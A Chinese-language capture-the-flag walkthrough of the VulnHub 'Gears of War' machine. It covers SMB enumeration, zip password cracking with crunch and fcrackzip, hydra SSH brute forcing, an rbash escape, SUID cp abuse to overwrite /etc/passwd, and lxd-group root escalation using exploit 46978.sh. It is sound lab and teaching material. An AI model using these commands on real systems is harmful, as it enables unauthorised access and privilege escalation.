Gear_Of_War靶机

靶场下载


https://www.vulnhub.com/entry/gears-of-war-ep1%2C382/

一、信息收集

发现主机

nmap -sP 192.168.16.0/24

Gear_Of_War靶机_第1张图片

获取开放端口等信息

nmap -sV -sC -A  -p 1-65535 192.168.16.207

Gear_Of_War靶机_第2张图片

扫描目录没有发现

二、445端口利用

工具一:smbma

扫描共享状态信息

smbmap -H 192.168.16.207 

可以看到LOCUS_LAN$ 是可以读取的

Gear_Of_War靶机_第3张图片

读取内容

看到两个文件

smbmap -H 192.168.16.207 -R   LOCUS_LAN$  

Gear_Of_War靶机_第4张图片

使用smbclient连接

并使用get将文件下载到本地

smbclient //192.168.16.207/LOCUS_LAN$

Gear_Of_War靶机_第5张图片

查看SOS.txt文件可以看到有个提示和 @%%,有关

Gear_Of_War靶机_第6张图片

直接解压msg_horda.zip发现需要密码

生产字典

工具:crunch

crunch参数:

crunch <min-len> <max-len> [<charset string>] [options]
min-len crunch要开始的最小长度字符串。即使不使用参数的值,也需要此选项
max-len crunch要开始的最大长度字符串。即使不使用参数的值,也需要此选项
charset string 在命令行使用crunch你可能必须指定字符集设置,否则将使用缺省的字符集设置。

-t:指定模式
@: 插入瞎写字母
,: 插入大写字母
%: 插入数字
^: 插入特殊符号
crunch 4 4 -t @%%, > list.txt

生成四位字典文件

破解压缩包密码

fcrackzip -D -u -p list.txt msg_horda.zip

Gear_Of_War靶机_第7张图片

解压:

unzip  msg_horda.zip 

得到ket.txt

查看内容得到密码3_d4y

Gear_Of_War靶机_第8张图片

获取账号

只有两个一个root,一个nobody

 enum4linux 192.168.16.207 -R | grep Local

Gear_Of_War靶机_第9张图片

ssh登录尝试密码不对,应该是别的账号

Gear_Of_War靶机_第10张图片

ssh暴力破解账号

这里的自带你需要解压

gzip -d /usr/share/wordlists/rockyou.txt.gz

开始破解

hydra -L /usr/share/wordlists/rockyou.txt -p 3_day ssh://192.168.16.207

Gear_Of_War靶机_第11张图片

三、ssh登录

ssh [email protected]

Gear_Of_War靶机_第12张图片

文件访问绕过

在目录中发现文件夹,访问被拒绝,-rbash 受限

Gear_Of_War靶机_第13张图片

回到kali使用命令重新连接绕过rbash

ssh [email protected] -t "bash -noprofile"

-t 强制登录

没有发现里面有东西

Gear_Of_War靶机_第14张图片

四、cp提权

1.查看suid文件

find / -perm -u=s -type f 2>/dev/null

Gear_Of_War靶机_第15张图片

可以看到有cp命令,就可以替换passwd文件了

2.生成密文

 openssl passwd -1 -salt sb 123

image-20230821174904836

将/etc/passwd内容复制下来进行替换

Gear_Of_War靶机_第16张图片

Gear_Of_War靶机_第17张图片

登录成功

Gear_Of_War靶机_第18张图片

3.找到flag

Gear_Of_War靶机_第19张图片

五、lxd提权

id看到该普通用户属于lxd组

marcus@gears_of_war:/tmp$ id
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

搜索漏洞编号

searchsploit  lxd
searchsploit   -p 46978.sh

#-p参数可以获取更多关于该漏洞的信息

Gear_Of_War靶机_第20张图片

详细位置

Gear_Of_War靶机_第21张图片

下载镜像:https://github.com/saghul/lxd-alpine-builder/

将exp和镜像上传到靶场

执行:

chmod 777 46978.sh

./46978.sh -f alpine-v3.13-x86_64-20210218_0139.tar.gz 

Gear_Of_War靶机_第22张图片

提权成功

你可能感兴趣的:(Web安,网络安全学习,java,linux,服务器)